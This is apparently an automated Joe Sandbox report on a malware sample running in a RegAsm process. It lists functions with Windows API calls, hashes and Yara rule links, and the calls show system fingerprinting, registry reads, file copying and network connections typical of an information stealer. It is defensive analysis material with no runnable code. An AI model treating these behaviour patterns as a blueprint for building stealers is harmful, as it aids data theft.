Part of subcall function 004C8590: WSACleanup.WS2_32 ref: 004C8690

recv.WS2_32(?,00000004,00000008), ref: 004C7E23
__Xtime_get_ticks.LIBCPMT ref: 004C7E2A
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004C7E38
Sleep.KERNELBASE(00000001,00000000,?,00002710,00000000), ref: 004C7EB1
Sleep.KERNELBASE(00000064,?,00002710,00000000), ref: 004C7EB9

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: recv$Sleepsetsockopt$CleanupErrorLastStartupUnothrow_t@std@@@Xtime_get_ticks__ehfuncinfo$??2@closesocketconnectfreeaddrinfogetaddrinfosocket
String ID:
API String ID: 4125349891-0
Opcode ID: cc848c3ef47df5887a672661092b3d595f42e3f4451cfba1465713a84d430695
Instruction ID: b3d54dcccad81d83ab75f13ba9899d4b50e1d8608cabcccfb3508871926cac68
Opcode Fuzzy Hash: cc848c3ef47df5887a672661092b3d595f42e3f4451cfba1465713a84d430695
Instruction Fuzzy Hash: 9EB1AC71D043089BEB10DBA8CC49BAEBBB1BB54314F24025EE815BB2D2D7785D88DF95

Function 00442CD3 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0044298C: CreateFileW.KERNELBASE(?,?,?,?,?,?,00000000), ref: 004429A9

GetLastError.KERNEL32 ref: 00442DE7
__dosmaperr.LIBCMT ref: 00442DEE
GetFileType.KERNELBASE(00000000), ref: 00442DFA
GetLastError.KERNEL32 ref: 00442E04
__dosmaperr.LIBCMT ref: 00442E0D
CloseHandle.KERNEL32(00000000), ref: 00442E2D
CloseHandle.KERNEL32(?), ref: 00442F7A
GetLastError.KERNEL32 ref: 00442FAC
__dosmaperr.LIBCMT ref: 00442FB3

Strings

H, xrefs: 00442F38

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 899e8745e59b9231842c25977fdcfb02482e73fc2f27b2205138a63271f33108
Instruction ID: 5150a9c177428a163fa7fb1c8ad58043a10a64c5935946436f9da82f6cbe0861
Opcode Fuzzy Hash: 899e8745e59b9231842c25977fdcfb02482e73fc2f27b2205138a63271f33108
Instruction Fuzzy Hash: 4EA15832A101149FEF19AF68DC917AE3BB1AB06314F58014EF801EF3A1CB799C56DB59

Function 00448910 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 292
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 00448B91, 00448B94

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: 902ce7424542a7d6309be3872ecc1540050696f48f214c3cf9d5a8d8ad4329c7
Instruction ID: d4d7462daa34083545f9d93f0c5ebf53bf58a01a885379ada905c47cec286c1a
Opcode Fuzzy Hash: 902ce7424542a7d6309be3872ecc1540050696f48f214c3cf9d5a8d8ad4329c7
Instruction Fuzzy Hash: E2B1F4B0A00245AFFB11DF99C881BAE7BB1FF55304F14015EE414AB392CB78AD81CB69

Function 004C8590 Relevance: 12.1, APIs: 8, Instructions: 92
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32 ref: 004C85BA
getaddrinfo.WS2_32(?,?,?,00589328), ref: 004C863C
socket.WS2_32(?,?,?), ref: 004C865D
connect.WS2_32(00000000,00559BFC,?), ref: 004C8671
closesocket.WS2_32(00000000), ref: 004C867D
freeaddrinfo.WS2_32(?,?,?,?,00589328,?,?), ref: 004C868A
WSACleanup.WS2_32 ref: 004C8690
freeaddrinfo.WS2_32(?,?,?,?,00589328,?,?), ref: 004C86A5

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: freeaddrinfo$CleanupStartupclosesocketconnectgetaddrinfosocket
String ID:
API String ID: 58224237-0
Opcode ID: 52d29ec15fbf37ccd53ab56e21f2e3f1d11727fcf2b6a4206c2cbc59116a4c78
Instruction ID: ffa07009e3086412046aa5b15573dbd5c691e56a3beb11943292ef2f0f62f1de
Opcode Fuzzy Hash: 52d29ec15fbf37ccd53ab56e21f2e3f1d11727fcf2b6a4206c2cbc59116a4c78
Instruction Fuzzy Hash: 9531C1726043009BD7208F25DC48B2BB7E5FB94729F114B1EF9A4922E0D7759C089AA7

Function 00442736 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 221
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?,00000000), ref: 004429A9

Strings

@, xrefs: 004427FD
.D, xrefs: 00442971
.D, xrefs: 0044273D, 00442740, 0044295D, 00442859, 004429A6

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: CreateFile
String ID: @$.D$.D
API String ID: 823142352-1140137659
Opcode ID: a9d7240431adedded6e0068ac080b28654d4cd48d90e50e37c7b511c1b4439b2
Instruction ID: 8a5bd5070e386d75612999e9c6525f1819e861122a4d8d87aea541b7a466abe7
Opcode Fuzzy Hash: a9d7240431adedded6e0068ac080b28654d4cd48d90e50e37c7b511c1b4439b2
Instruction Fuzzy Hash: 57612BB1A00109ABFF259E28DE85BBE7B54EB10364FA84227F904D7390D2BCCD91965D

Function 004E6CA0 Relevance: 6.1, APIs: 4, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE(?,?,00000006,00000005,00000005,?), ref: 004E6CFC
GetLastError.KERNEL32(?,?,00000006,00000005,00000005,?), ref: 004E6D07
std::_Throw_Cpp_error.LIBCPMT ref: 004E6D4F
std::_Throw_Cpp_error.LIBCPMT ref: 004E6D60

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: Cpp_errorThrow_std::_$AttributesErrorFileLast
String ID:
API String ID: 995686243-0
Opcode ID: 3120929ec45ee0086a62fe527d0d8f49284849e7ce8a43a234ec1e7741655826
Instruction ID: 241e2f942859b358e1133ab4bf22632851a161ac9c5554c12c2f2fb0b7350d8e
Opcode Fuzzy Hash: 3120929ec45ee0086a62fe527d0d8f49284849e7ce8a43a234ec1e7741655826
Instruction Fuzzy Hash: DF11CE71A0028496DB205F6A5C08F6A7F60EB22772F64031BD8359B3D4DB3948058759

Function 004435E9 Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,004435E3,00000016,00438A63,?,?,495F3D5D,00438A63,?), ref: 004435FA
TerminateProcess.KERNEL32(00000000,?,004435E3,00000016,00438A63,?,?,495F3D5D,00438A63,?), ref: 00443601
ExitProcess.KERNEL32 ref: 00443613

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 69c426e6c401d1e8d1ea007df5e4f58358fbed6c50feac9c0c1d9b73cd67489a
Instruction ID: df295c80cc57fa9c67f68f9c8245e2237928dd2aeb93de4157178db3b465fc19
Opcode Fuzzy Hash: 69c426e6c401d1e8d1ea007df5e4f58358fbed6c50feac9c0c1d9b73cd67489a
Instruction Fuzzy Hash: 15D05E32000205BBDF202F61DC0D85D3F35AF10747B010015B80546231CF36DA86EAA8

Function 0044298C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?,00000000), ref: 004429A9

Strings

.D, xrefs: 0044273D, 00442740, 0044295D, 00442859, 004429A6

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: CreateFile
String ID: .D
API String ID: 823142352-2659653689
Opcode ID: 9c728ddfee9c54fb3e95c04c245e6250a3a2534adf7d99ecf6cfd652071d74be
Instruction ID: d272b26d39d4c1a932e1863db2ccc44a4dabdf9078851b65b676bd57bd2e36c0
Opcode Fuzzy Hash: 9c728ddfee9c54fb3e95c04c245e6250a3a2534adf7d99ecf6cfd652071d74be
Instruction Fuzzy Hash: 7DD06C3200020DBBDF128F84DC06EDA3BAAFB48754F014000BA1856120C736E861EB90

Function 004E57F0 Relevance: 3.4, APIs: 2, Instructions: 350
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,?,00000000,00000000), ref: 004E588F
GetVolumeInformationA.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 004E5B9B

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: DirectoryInformationVolumeWindows
String ID:
API String ID: 3487004747-0
Opcode ID: 2c386201d9b8b37cd6db3286d9fd26f55c65a99c4bf9a028f00447527475a177
Instruction ID: 009fea26e280c08ebde66711631a2368a09a7ac58c7b38572a32fddf838a6e16
Opcode Fuzzy Hash: 2c386201d9b8b37cd6db3286d9fd26f55c65a99c4bf9a028f00447527475a177
Instruction Fuzzy Hash: 81F157B0D002499BDB14CFA8C9957EEBBB1FF08304F24425EE545BB381DB756A84CBA5

Function 00448DFF Relevance: 3.1, APIs: 2, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,CF830579,?,00448CE6,00000000,CF830579,0057A178,0000000C,00448DA2,0043D07D,?), ref: 00448E55
GetLastError.KERNEL32(?,00448CE6,00000000,CF830579,0057A178,0000000C,00448DA2,0043D07D,?), ref: 00448E5F

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification
String ID:
API String ID: 1687624791-0
Opcode ID: 1fe827fdfe079599b9b1dab25e2b646f0beb01ea40d46a72429d261cc15a62e7
Instruction ID: bfed174018f4c3fae0b74bea86efe9ace0911028d3bee9629bfc5162a0057b67
Opcode Fuzzy Hash: 1fe827fdfe079599b9b1dab25e2b646f0beb01ea40d46a72429d261cc15a62e7
Instruction Fuzzy Hash: 6E1125336042102AF6252236A84677F67499B82738F39061FF918CB2D2DF689C81825D

Function 0044251C Relevance: 3.1, APIs: 2, Instructions: 52
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNELBASE(00000000,00000000,00579E30,00432B5E,00000002,00432B5E,00000000,?,?,?,00442626,00000000,?,00432B5E,00000002,00579E30), ref: 00442558
GetLastError.KERNEL32(00432B5E,?,?,?,00442626,00000000,?,00432B5E,00000002,00579E30,00000000,00432B5E,00000000,00579E30,0000000C,0043D61E), ref: 00442565

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 0df1753fdbe4f7a704092f8361e7cfb0c7cc0fcadc70f8748e4d2d33b1623b65
Instruction ID: bcffdd1dd92d970d4fbe8e398a8ab980657c5c2bf717c74f1f656664416c076e
Opcode Fuzzy Hash: 0df1753fdbe4f7a704092f8361e7cfb0c7cc0fcadc70f8748e4d2d33b1623b65
Instruction Fuzzy Hash: 9B012632610615BFDF158F69DC1699E3B29EB84334F240209F8019B2E1E6B5ED429BA4

Function 0044B01A Relevance: 3.0, APIs: 2, Instructions: 22
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000000,?,00451B48,?,00000000,?,?,00451DE9,?,00000007,?,?,004522DD,?,?), ref: 0044B030
GetLastError.KERNEL32(?,?,00451B48,?,00000000,?,?,00451DE9,?,00000007,?,?,004522DD,?,?), ref: 0044B03B

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 1c4e9b2b04b0a897153f19679bc75b8cfe8e1d75e6b310813c54f5389fc1414e
Instruction ID: f233056e1464041c82b2d36bf1c88bdb576215b3e64377b8de55bab97aefa9e3
Opcode Fuzzy Hash: 1c4e9b2b04b0a897153f19679bc75b8cfe8e1d75e6b310813c54f5389fc1414e
Instruction Fuzzy Hash: 66E08C32100204ABEB212FA5AC0CB9A3B69EF00756F15802AF608971B0DB38C894D798

Function 004C7EF0 Relevance: 1.9, APIs: 1, Instructions: 399COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef3fac04116395422b11f4e11df71cc3cedfdd90027bebaa335d774efe24512
Instruction ID: 65307ecbef6fb9e01e3d4ad067897c34c173f6a72c2a6aa1ef5fcaa49911cde8
Opcode Fuzzy Hash: 3ef3fac04116395422b11f4e11df71cc3cedfdd90027bebaa335d774efe24512
Instruction Fuzzy Hash: 0E02A070D04248DFDB14DF68C945BDDBBB0AB14308F14419ED8057B386EBB95E88DB9A

Function 00438E02 Relevance: 1.7, APIs: 1, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f659cc8a9a49272dc5a8b65b091f37dbf03ca88fa3bd65ce108d20efe530995
Instruction ID: 9663080612542d3e5f9b84a36c3ecf1ef98ea00319430370267f097460dfd66c
Opcode Fuzzy Hash: 9f659cc8a9a49272dc5a8b65b091f37dbf03ca88fa3bd65ce108d20efe530995
Instruction Fuzzy Hash: 2651C670A00204AFDF14DF59C881AAABBA2EF8D328F24915EF8089B352D775DD41CB55

Function 0044AC7F Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 0044ACB9

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 8ff9ba0f0c894046871fc86ec0e9a1d79c4c84a1d92275a4dcbeaa53a6bd2b85
Instruction ID: f3143862af3a299983658f939e96efeb3759b05c7c18c303aa6d1d81ce31e1ed
Opcode Fuzzy Hash: 8ff9ba0f0c894046871fc86ec0e9a1d79c4c84a1d92275a4dcbeaa53a6bd2b85
Instruction Fuzzy Hash: 92112A71A0420AAFDF05DF58E94199F7BF5EF48304F04405AF809EB351D670DA25CB69

Function 004E5D00 Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

SetupDiGetClassDevsA.SETUPAPI(0055D560,00000000,00000000), ref: 004E5D47

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: ClassDevsSetup
String ID:
API String ID: 2330331845-0
Opcode ID: 3d8916a0f3a5560b99d21513aef90176b581373bb7b6b0032725707bac5390a9
Instruction ID: 3af1858aaf6aa964ebdd9f4359c5c99147492c850a3065a18f0c0dee6211d041
Opcode Fuzzy Hash: 3d8916a0f3a5560b99d21513aef90176b581373bb7b6b0032725707bac5390a9
Instruction Fuzzy Hash: A0110EB1D04B449BE3208F28DD0A757BBF0EB00B28F10471EE850573C1E3BA6A4887E2

Function 00408A00 Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNELBASE(00000000,?,00000200), ref: 00408A4F

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: 32cb3c5e00b2599faed93c08183adb436d750bfb0166f699d95d9d325d08ef4e
Instruction ID: 6e8de35883c94421f6301e6c0c787345002e95f66c58390e835373a5d1cb831f
Opcode Fuzzy Hash: 32cb3c5e00b2599faed93c08183adb436d750bfb0166f699d95d9d325d08ef4e
Instruction Fuzzy Hash: 431104B1940319ABD720DF54CD08BDBBBB8EB04704F00435AE418A72C1EBB856488BE1

Function 004032D0 Relevance: 1.5, APIs: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 0040331F

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 0fd589d96c9d07b1efa01aec19e4ff46bb0766daf2056f60d33bc81ca57302d3
Instruction ID: ac639495c118a2832fc09027b5ebf4fad0cef292c7be368858978faeea3118d5
Opcode Fuzzy Hash: 0fd589d96c9d07b1efa01aec19e4ff46bb0766daf2056f60d33bc81ca57302d3
Instruction Fuzzy Hash: 63F024321001009BCB246F61D4565EAB7ECDF28366B50083FFC8DD7292EB3EDA408788

Function 0044B094 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00434B3F,?,?,74D723A0,?,?,00403522,?,?), ref: 0044B0C6

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c639ae0624eff34eb8e57d07392fb4ffc7a0b3e65f726cef66c68c9318aea675
Instruction ID: 07eaf642519ac51a5bd3283dd2addbb445c80e248ae9cef49388ffb333b33e8c
Opcode Fuzzy Hash: c639ae0624eff34eb8e57d07392fb4ffc7a0b3e65f726cef66c68c9318aea675
Instruction Fuzzy Hash: 99E022322006206BFF313AA69C14B5B764CEF413A3F190227EC25A62D1DB3CCC0092EE

Function 004466D5 Relevance: 1.5, APIs: 1, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004466DC

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: f97e20be6f9967ed6d0bdb0fc59c364b82bb9609628a7e062ab6fec8fc85ac89
Instruction ID: ccf5b3b5ee64302dd7184922bc8d264c22512182c10063c293431932d1ea205a
Opcode Fuzzy Hash: f97e20be6f9967ed6d0bdb0fc59c364b82bb9609628a7e062ab6fec8fc85ac89
Instruction Fuzzy Hash: 13E09AB2C0020D9ADB00DFD5C452BEFBBB8AB08315F50446BA205E6181EB789748CBE5

Function 004C7610 Relevance: 1.3, APIs: 1, Instructions: 43sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00000065), ref: 004C7687

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: cdf796cff2500180b5357932d8a1fccac0fd4c8e8477ccb0b24b8be388a44c44
Instruction ID: c179e46818712b04b76ad6c1e26b8ffb8fe1941cac30ce3ac6a63f8a8f4fb627
Opcode Fuzzy Hash: cdf796cff2500180b5357932d8a1fccac0fd4c8e8477ccb0b24b8be388a44c44
Instruction Fuzzy Hash: 3101F731B08794AFDB109B5C9C0AB6B7BA4E751B38F18424EE810277C2DBB9180487D6

Function 004C77F0 Relevance: 1.3, APIs: 1, Instructions: 43sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00000065), ref: 004C7867

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 3872e6a14bb81a0b91af25964e9f7d6f6dbde225df7f4945679319845adb5926
Instruction ID: 1f7e8826813b3d2380bd617aa3bbe7adeb215e0cc6f29ab4b1c79d6fe0be74c1
Opcode Fuzzy Hash: 3872e6a14bb81a0b91af25964e9f7d6f6dbde225df7f4945679319845adb5926
Instruction Fuzzy Hash: 7601F731E08284AFE721AB599C0AB6B7BE5E741B24F08028EF951273D1CBB91804C7D2

Non-executed Functions

Function 004DFF00 Relevance: 94.9, APIs: 50, Strings: 2, Instructions: 3939registrytimefileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 004E010B
CreateDirectoryA.KERNEL32(00000000,00000000,0000002E,0000002F,?,?,?,?,00565B0C,00000001,0000002E,0000002F,?,0055B49C,3"A,0055B49C), ref: 004E03DB
CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 004E0556
FindNextFileA.KERNEL32(00000000,?), ref: 004E056C
FindClose.KERNEL32(00000000), ref: 004E057C
GetLastError.KERNEL32 ref: 004E0582
GetLastError.KERNEL32 ref: 004E05A0

Part of subcall function 004E71E0: GetCurrentProcess.KERNEL32(?), ref: 004E71EF
Part of subcall function 004E71E0: IsWow64Process.KERNEL32(00000000), ref: 004E71F6

Part of subcall function 0044196B: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00441980
Part of subcall function 0044196B: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0044199F

RegOpenKeyExA.ADVAPI32(80000002,?,00000000,?,00000000,?,?), ref: 004E0D31
RegQueryValueExA.ADVAPI32(00000000,?,00000000,00020019,?,00000400), ref: 004E0DFD
RegCloseKey.ADVAPI32(00000000), ref: 004E0E32
GetCurrentHwProfileA.ADVAPI32(?), ref: 004E0FCA
GetModuleHandleExA.KERNEL32(00000004,Function_000E5FC0,00000000), ref: 004E14CB
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004E14E3
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,?,?), ref: 004E1E96
RegQueryValueExA.ADVAPI32(?,?,00000000,00020019,?,?), ref: 004E1F62
RegCloseKey.ADVAPI32(?), ref: 004E21E1
GetComputerNameA.KERNEL32(?,00000104), ref: 004E2215
GetUserNameA.ADVAPI32(?,00000104), ref: 004E23B3
GetDesktopWindow.USER32 ref: 004E2456
GetWindowRect.USER32(00000000,?), ref: 004E2464
GetUserDefaultLocaleName.KERNEL32(?,00000200), ref: 004E25CF
GetKeyboardLayoutList.USER32(00000000,00000000), ref: 004E2A95
LocalAlloc.KERNEL32(00000040), ref: 004E2AA7
GetKeyboardLayoutList.USER32(?,00000000), ref: 004E2AC2
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 004E2AED
LocalFree.KERNEL32(?), ref: 004E2CB0
GetLocalTime.KERNEL32(?), ref: 004E2CC7
GetSystemTime.KERNEL32(?), ref: 004E2EDD
GetTimeZoneInformation.KERNEL32(?), ref: 004E2F00
TzSpecificLocalTimeToSystemTime.KERNEL32(?,?,?), ref: 004E2F25
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,00000000), ref: 004E333F
RegQueryValueExA.ADVAPI32(00000000,?,00000000,00020019,?,00000400), ref: 004E3491
RegCloseKey.ADVAPI32(00000000), ref: 004E3542
GetSystemInfo.KERNEL32(?), ref: 004E356A
GlobalMemoryStatusEx.KERNEL32(00000040), ref: 004E361D
EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 004E3731
EnumDisplayDevicesA.USER32(00000000,00000001,?,00000001), ref: 004E3B14
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004E3C53
Process32First.KERNEL32(00000000,00000128), ref: 004E3C6B
Process32Next.KERNEL32(00000000,00000128), ref: 004E3C81
Process32Next.KERNEL32(00000000,?), ref: 004E3D53
CloseHandle.KERNEL32(00000000), ref: 004E3D62
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?), ref: 004E40D6
RegEnumKeyExA.ADVAPI32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004E410D
wsprintfA.USER32 ref: 004E41F0
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?), ref: 004E4213
RegQueryValueExA.ADVAPI32(?,?,00000000,000F003F,?,00000400), ref: 004E4312
RegQueryValueExA.ADVAPI32(?,?,00000000,000F003F,?,00000400), ref: 004E4409
RegCloseKey.ADVAPI32(?), ref: 004E44E5
RegCloseKey.ADVAPI32(00000000), ref: 004E4500

Strings

;Yb., xrefs: 004E402D
3"A, xrefs: 004DFFC6, 004E0690, 004E0174, 004E0179, 004E0183

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: CloseTime$FileOpenQueryValue$LocalNameSystem$EnumFindNextProcess32$CreateCurrentDevicesDisplayErrorFirstHandleInfoKeyboardLastLayoutListLocaleModuleProcessUserWindow$AllocComputerCopyDefaultDesktopDirectoryFreeGlobalInformationMemoryProfileRectSnapshotSpecificStatusToolhelp32Unothrow_t@std@@@Wow64Zone__ehfuncinfo$??2@wsprintf
String ID: 3"A$;Yb.
API String ID: 3185416054-157130042
Opcode ID: a955cbe44d2b786934b5d622d23ec2d5b873c429cb7426ac0d7c7a248706ae2b
Instruction ID: 762722eee12899a3fad9018c2ab51fc1fd94b4ba954c9d0aaa9e31c72487c533
Opcode Fuzzy Hash: a955cbe44d2b786934b5d622d23ec2d5b873c429cb7426ac0d7c7a248706ae2b
Instruction Fuzzy Hash: BFB3EFB4D0426D8BDB25CF99C981AEEBBB1FF48300F1041AAD949B7351DB345A81CFA5

Function 004E6770 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 350COMMON

Download Yara Rule

APIs

std::_Throw_Cpp_error.LIBCPMT ref: 004E6BE7
std::_Throw_Cpp_error.LIBCPMT ref: 004E6BF8
CreateDirectoryA.KERNEL32(?,00000000,00000005,?), ref: 004E6C55
std::_Throw_Cpp_error.LIBCPMT ref: 004E6C84
std::_Throw_Cpp_error.LIBCPMT ref: 004E6C95

Strings

\*.*, xrefs: 004E6834

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

